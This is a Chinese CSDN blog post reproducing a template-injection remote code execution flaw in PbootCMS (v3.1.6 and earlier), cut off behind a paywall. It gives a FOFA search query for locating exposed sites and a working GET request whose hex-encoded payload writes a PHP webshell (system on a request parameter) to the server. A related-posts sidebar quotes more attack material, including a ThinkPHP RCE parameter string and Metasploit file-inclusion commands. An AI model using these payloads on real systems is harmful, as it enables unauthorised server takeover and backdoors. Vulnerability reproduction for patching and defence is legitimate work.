PbootCMS 前台RCE漏洞复现

已于 2024-06-25 12:32:29 修改
阅读量106 收藏
点赞数
分类专栏: web漏洞 文章标签: 安全 xss
于 2024-06-24 14:00:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/139924216
版权

0x01 产品简介

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要

0x02 漏洞概述

PbootCMS v<=3.1.6版本中存在模板注入,攻击者可构造特定的链接利用该漏洞,执行任意代码,写入后门,获取服务器权限,进而控制整个web服务器.

0x03 复现环境

FOFA:app="PbootCMS-PHP网站开发管理系统"

0x04 漏洞复现

PoC-1

GET /?member/login/aaaaaa}{pboot:if(true);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/test1;use/**/function/**/get/**/as/**/test3;use/**/function/**/hex2bin/**/as/**/test4;test(test1(test3('file'),'w'),test4(test3('content')));if(true)}{/pboot:if}&file=.a.php&content=3c3f7068702073797374656d28245f524551554553545b2761275d293b3f3e HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10
了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
PbootCMS后台存储型XSS漏*洞复现 CVE-2020-20363
afei001
10-05 1164
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 存在跨站脚本漏洞,该漏洞源于产品的admin.php页面未对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
PbootCms-3.04前台RCE挖掘过程1
08-03
是借鉴了第篇章的某些思路。接着直接来看代码,先标仍然是解析 if 标签的代码块,看下三个正则相对于上个版本来说,第三条正则多了 (\([\w\s\.]+\))
0day PbootCMS-pboot远程命令执行漏洞
weixin_43167326的博客
04-10 1847
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在RCE漏洞导致攻击者可利用该漏洞远程执行命令。
Goby 漏洞发布|PBOOTCMS /tag/index 代码执行漏洞
最新发布
m0_46699477的博客
05-21 310
PbootCMS 是全新内核且永久开源免费的 PHP 企业网站开发建设管理系统,是一套高效、简洁、强悍的可免费商用的 PHP CMS 源码,能够满足各类企业网站开发建设的需要。攻击者可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个 web 服务器。
RCE漏洞案例-PbootCMS1.3.2
c0529的博客
05-18 738
下载下来之后先看下md文件我们小皮上面设置好网站和数据库之后,在对应文件进行修改然后导入数据库文件之后我们直接打开网站我在这个时候遇到了两个问题1.一直显示php版本过低,我换了很多次都没办法2.显示没有带上php扩展gd扩展,这个我查看扩展是带了的我解决1的方法是不要带127.0.0.1这个前标去访问,改一下网站的域名,最好不要带特殊字符比如.这些的,可能容易造成浏览器的错误2的解决方法是换php的版本,我从5.5换到了7.0,终于登上 了。
wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】
这周末在做梦的博客
11-06 4856
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1赛题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5368
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 569
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
暗月渗透实战靶场-项目八(上)
高高同学
02-10 6588
暗月渗透实战靶场-项目八
点击劫持漏洞原理及利用包含修复建议
课嗨教育的专栏
01-12 3770
今天群里有人问如何查看是否存在点击劫持漏洞,我们首先了解下漏洞是如何产生的,点击劫持漏洞是因为网站未对referer来源进行验证导致的。 具体测试及利用的话我们可以用iframe制作一个透明标签在上面: 案例: <!DOCTYPE HTML> <html> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <head> <title>点击劫持<
xray poc-yaml-joomla-cve-2018-7314-sql
课嗨教育的专栏
01-20 3441
漏洞描述 Joomla!是美国OpenSourceMatters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。PrayerCenter是使用在其中的一个祷告分享组件。Joomla!PrayerCenter3.0.2版本中存在SQL注入漏洞。远程攻击者可借助‘sessionid’参数利用该漏洞查看、添加、更改或删除后端数据库中的信息。 SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla!
YKfaka优卡自动发卡程序漏洞合集(这是篇水文)
课嗨教育的专栏
08-09 2777
alert(/xss/)
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2245
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
fofa爬虫(刷漏洞平台好方法)
课嗨教育的专栏
05-01 2244
目录 说明: 代码 配置 说明: 支持多关键词爬虫,适合于rad+xray联动。 关键词一行一个,fofa.txt文本内容为关键词,target内容为结果,直接与Xray_Rad_Fusion放在同一个目录下执行即可联动。 代码 import requests,os,sys,base64,json,re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.url
PHP文件包含漏洞 Metasploit
课嗨教育的专栏
11-13 2208
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt 然后/lfi.php?file=http://5.5.5.3:1111/1.txt 启动METASPLOIT msf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2 RHOST => 5.5.5.2 msf exploit(php_in
致远OA任意文件上传
课嗨教育的专栏
05-10 2070
1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell def seeyon_new_rce(targeturl): orgurl=targeturl #通过请求直接获取管理员权限cookie targeturl=orgurl+'seeyon/thirdpartyController.do' post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmc
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值